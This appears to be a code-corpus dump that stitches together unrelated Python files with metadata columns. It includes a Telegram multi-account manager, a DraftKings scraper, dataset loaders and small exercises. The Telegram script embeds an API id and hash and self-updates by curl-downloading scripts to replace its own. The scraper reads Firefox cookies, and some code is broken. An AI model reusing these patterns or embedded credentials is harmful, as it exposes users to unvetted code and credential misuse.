print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| en | 0.605556 | # fancy logo #print('=============SON OF GENISYS==============') #client.sign_in(phone, input('[+] Enter the code: ')) # thanks to github.com/th3unkn0n for the snippet below # https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt #os.system('del scraper.py') | 2.192449 | 2 |
src/m2ee/client_errno.py | rus-kh/m2ee-tools | 23 | 9157 | <reponame>rus-kh/m2ee-tools<filename>src/m2ee/client_errno.py
#
# Copyright (C) 2009 Mendix. All rights reserved.
#
SUCCESS = 0
# Starting the Mendix Runtime can fail in both a temporary or permanent way.
# Some of the errors can be fixed with some help of the user.
#
# The default m2ee cli program will only handle a few of these cases, by
# providing additional hints or interactive choices to fix the situation and
# will default to echoing back the error message received from the runtime.
# Database to be used does not exist
start_NO_EXISTING_DB = 2
# Database structure is out of sync with the application domain model, DDL
# commands need to be run to synchronize the database.
start_INVALID_DB_STRUCTURE = 3
# Constant definitions used in the application model are missing from the
# configuration.
start_MISSING_MF_CONSTANT = 4
# In the application database, a user account was detected which has the
# administrative role (as specified in the modeler) and has password '1'.
start_ADMIN_1 = 5
# ...
start_INVALID_STATE = 6
start_MISSING_DTAP = 7
start_MISSING_BASEPATH = 8
start_MISSING_RUNTIMEPATH = 9
start_INVALID_LICENSE = 10
start_SECURITY_DISABLED = 11
start_STARTUP_ACTION_FAILED = 12
start_NO_MOBILE_IN_LICENSE = 13
check_health_INVALID_STATE = 2
| #
# Copyright (C) 2009 Mendix. All rights reserved.
#
SUCCESS = 0
# Starting the Mendix Runtime can fail in both a temporary or permanent way.
# Some of the errors can be fixed with some help of the user.
#
# The default m2ee cli program will only handle a few of these cases, by
# providing additional hints or interactive choices to fix the situation and
# will default to echoing back the error message received from the runtime.
# Database to be used does not exist
start_NO_EXISTING_DB = 2
# Database structure is out of sync with the application domain model, DDL
# commands need to be run to synchronize the database.
start_INVALID_DB_STRUCTURE = 3
# Constant definitions used in the application model are missing from the
# configuration.
start_MISSING_MF_CONSTANT = 4
# In the application database, a user account was detected which has the
# administrative role (as specified in the modeler) and has password '1'.
start_ADMIN_1 = 5
# ...
start_INVALID_STATE = 6
start_MISSING_DTAP = 7
start_MISSING_BASEPATH = 8
start_MISSING_RUNTIMEPATH = 9
start_INVALID_LICENSE = 10
start_SECURITY_DISABLED = 11
start_STARTUP_ACTION_FAILED = 12
start_NO_MOBILE_IN_LICENSE = 13
check_health_INVALID_STATE = 2 | en | 0.916233 | # # Copyright (C) 2009 Mendix. All rights reserved. # # Starting the Mendix Runtime can fail in both a temporary or permanent way. # Some of the errors can be fixed with some help of the user. # # The default m2ee cli program will only handle a few of these cases, by # providing additional hints or interactive choices to fix the situation and # will default to echoing back the error message received from the runtime. # Database to be used does not exist # Database structure is out of sync with the application domain model, DDL # commands need to be run to synchronize the database. # Constant definitions used in the application model are missing from the # configuration. # In the application database, a user account was detected which has the # administrative role (as specified in the modeler) and has password '1'. # ... | 1.463351 | 1 |
datasets/__init__.py | andrewliao11/detr | 0 | 9158 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
| # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
| en | 0.502991 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved # if isinstance(dataset, torchvision.datasets.CocoDetection): # break # if isinstance(dataset, torchvision.datasets.CocoDetection): # break #elif dataset_args.name == 'viper': # from .viper import build as build_viper # return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping) | 2.253178 | 2 |
dkhomeleague/dkhomeleague.py | sansbacon/dkhomeleague | 0 | 9159 | # dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
Sheet is set up with week as Column A, League Users as Column B -
Each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
ws = pdsheet.get_worksheet(self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
| # dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
Sheet is set up with week as Column A, League Users as Column B -
Each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
ws = pdsheet.get_worksheet(self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
| en | 0.703664 | # dkhomeleague.py scrapes league results Creates instance Args: league_key (str): id for home league username (str): your username Returns: Scraper Gets contest leaderboard Gets contest lineup Args: draftgroup_id (int): the draftgroupId entry_key (int): the id for the user's entry into the contest can find entryKey in the leaderboard resource Returns: dict Gets json resource Gets historical contests Gets user historical results #url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}' #params = self.base_params #return self.get_json(url, params=params) Gets league metadata Gets upcoming contests Parses league results Creates instance Args: league_key (str): id for home league username (str): your username Returns: Parser Converts container to dataframe Reads json text in pth and creates python object Parses contest entry Args: data (dict): parsed JSON Returns: list: of dict Parses contest leaderboard Args: data (dict): parsed JSON Returns: list: of dict Parses historical league contests Args: data (dict): parsed JSON Returns: list: of contest dict Parses historical contests for user in league Args: data (dict): parsed JSON Returns: list: of dict Gets league members Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8 Args: data (dict): parsed JSON Returns: list: of str Gets league metadata Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8 Args: data (dict): parsed JSON Returns: dict: with user details # TODO: this may same as upcoming_contests, then filter on contestState Track league results with Google Sheets Sheet is set up with week as Column A, League Users as Column B - Each row is a weekly result starting with the week number Creates instance Args: sskey (str): key for worksheet json_secret_fn (str): fn with authentication secrets sheet_id (int): id for individual sheet Returns: Tracker Gets map of league members -> column number (A=1, etc.) Adds week results to sheet Args: week (int): the week results (dict): key is username, value is score # get the sheet # figure out the last row # now loop through the results and add to sheet Gets week results from sheet Args: week (int): the week of results Creates summary table of results | 2.978388 | 3 |
Graphing/Example1.py | Wadden12/Semester1 | 0 | 9160 | <gh_stars>0
#!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show() | #!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show() | fr | 0.386793 | #!/usr/bin/python3 | 3.25503 | 3 |
Cursoemvideo/desafios/desafio008.py | gentildf/Python | 1 | 9161 | #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros.
n = float(input('\033[32mDigite o numero:\033[m'))
print('O número digitado é \033[33m{0:.0f}m\033[m.\n'
'Ele apresentado em centimetros fica \033[33m{0:.2f}cm\033[m.\n'
'Apresentado em milímetros fica \033[33m{0:.3f}mm\033[m'
.format(n))
#print('O número em metros é {0}.\n
# O número em convertido para centimetros é {1}.\n
# O número convertido para milimetros é {2}'
# .format(n, n/100, n/1000))
| #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros.
n = float(input('\033[32mDigite o numero:\033[m'))
print('O número digitado é \033[33m{0:.0f}m\033[m.\n'
'Ele apresentado em centimetros fica \033[33m{0:.2f}cm\033[m.\n'
'Apresentado em milímetros fica \033[33m{0:.3f}mm\033[m'
.format(n))
#print('O número em metros é {0}.\n
# O número em convertido para centimetros é {1}.\n
# O número convertido para milimetros é {2}'
# .format(n, n/100, n/1000))
| pt | 0.942059 | #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros. #print('O número em metros é {0}.\n # O número em convertido para centimetros é {1}.\n # O número convertido para milimetros é {2}' # .format(n, n/100, n/1000)) | 4.05996 | 4 |
publish_fanout.py | Dordoloy/BachelorDIM-Lectures-Algorithms-2019 | 0 | 9162 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
# Parse CLODUAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
channel.basic_publish(exchange='posts',
routing_key='',
body='message')
print("send")
publish_fanout() | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
